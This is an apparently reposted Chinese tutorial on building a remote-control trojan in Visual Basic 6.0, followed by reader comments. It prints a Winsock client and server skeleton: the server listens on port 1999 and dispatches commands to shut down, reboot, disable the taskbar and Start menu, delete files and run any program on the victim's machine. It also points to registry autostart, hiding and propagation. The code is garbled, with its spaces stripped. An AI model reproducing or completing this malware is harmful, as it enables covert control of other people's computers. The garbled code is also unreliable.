浅谈用Visual Basic6.0编写木马程序

来源:网络时间:2012-05-09 17:05:23

  现在网络上流行的木马软件基本都是客户机/服务器模式也就是所谓的C/S结构,目前也有一些开始向B/S结构转变,在这里暂且不对B/S结构进行详谈,本文主要介绍C/S结构其原理就是在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。

  

  首先使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。

  

  在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:

  

  PrivateSubcmdConnect_Click()

  IfLen(Text1.Text)=0AndLen(Text2.Text)=0Then

  MsgBox("请输入主机名或主机IP地址。")

  ExitSub

  Else

  IfLen(Text1.Text)>0Then

  tcpClient.Remotehost=Text1.Text

  Else

  tcpClient.RemoteHost=Text2.Text

  EndIf

  EndIf

  tcpClient.Connect

  TIMer1.Enabled=True

  EndSub

  

  连接建立之后就可以使用DataArrival事件处理所收到的数据了。

  

  在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:

  

  PrivateSubForm_Load()

  tcpServer.LocalPort=1999

  tcpServer.Listen

  EndSub

  

  准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求。

  代码如下: 

  PrivateSuBTcpServer_ConnectionRequest

  (ByValrequestIDAsLong)

  IftcpServer.State<>sckClosedThen

  tcpServer.Close‘检查控件的State属性是否为关闭的。

  EndIf'如果不是,在接受新的连接之前先关闭此连接。

  tcpServer.AcceptrequestID

  EndSub  

  这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。

  

  建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:

  

  PrivateSuBTcpServer_DataArrival

  (ByValbytesTotalAsLong)

  DimstrDataAsString

  DimiAsLong

  DimmKeyAsString

  tcpServer.GetDatastrData

  '接收数据并存入strData

  Fori=1ToLen(strData)

  '分离strData中的命令

  IfMid(strData,i,1)="@"Then

  mKey=Left(strData,i-1)

  '把命令ID号存入mKey

  

  '把命令参数存入strData

  strData=Right(strData,Len(strData)-i)

  ExitFor

  EndIf

  Nexti

  SelectCaseVal(mKey)

  Case1

  ‘驱动器名、目录名、文件名

  Case2

  强制关闭服务器端的计算机

  Case3

  强制重启服务器端的计算机

  Case4

  屏蔽任务栏窗口;

  Case5

  屏蔽开始菜单;

  Case6

  按照客户机端传过来的文件名或目录名,而删除它;

  Case7

  屏蔽热启动键;

  Case8

  运行服务器端的任何程序

  EndSelect

  EndSub

  

  客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。

  

  另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:

  

  PrivateSuBTcpServer_Close()

  tcpServer.Close

  tcpServer.Listen

  EndSub  

  这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。  

  成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用来破坏别人的系统。

文章内容来源于网络,不代表本站立场,若侵犯到您的权益,可联系我们删除。(本站为非盈利性质网站) 联系邮箱:9145908@qq.com
多特网友 2014-07-26 22:06:30 回复
我是新手 谢谢指导
多特网友 2013-04-27 00:35:23 回复
##还不如我师父给的##
多特网友 2012-08-23 15:05:15 回复
windows自带的防火墙都能拦截下来……
多特网友 2012-03-24 18:26:14 回复
垃圾。。。要么就说完。。。又不是什么神秘的东西。
多特网友 2012-02-18 18:29:28 回复
现在,我们的入侵目标是##机,多学学java吧!
多特网友 2012-08-23 15:05:15 回复
windows自带的防火墙都能拦截下来……
多特网友 2011-11-09 13:47:51 回复
这种用WINSOCK控件编写出来的东西,马上被 主流的 防火墙 拦下,,有个P用
多特网友 2012-02-18 18:29:28 回复
现在,我们的入侵目标是##机,多学学java吧!
多特网友 2012-03-24 18:26:14 回复
垃圾。。。要么就说完。。。又不是什么神秘的东西。
多特网友 2013-04-27 00:35:23 回复
##还不如我师父给的##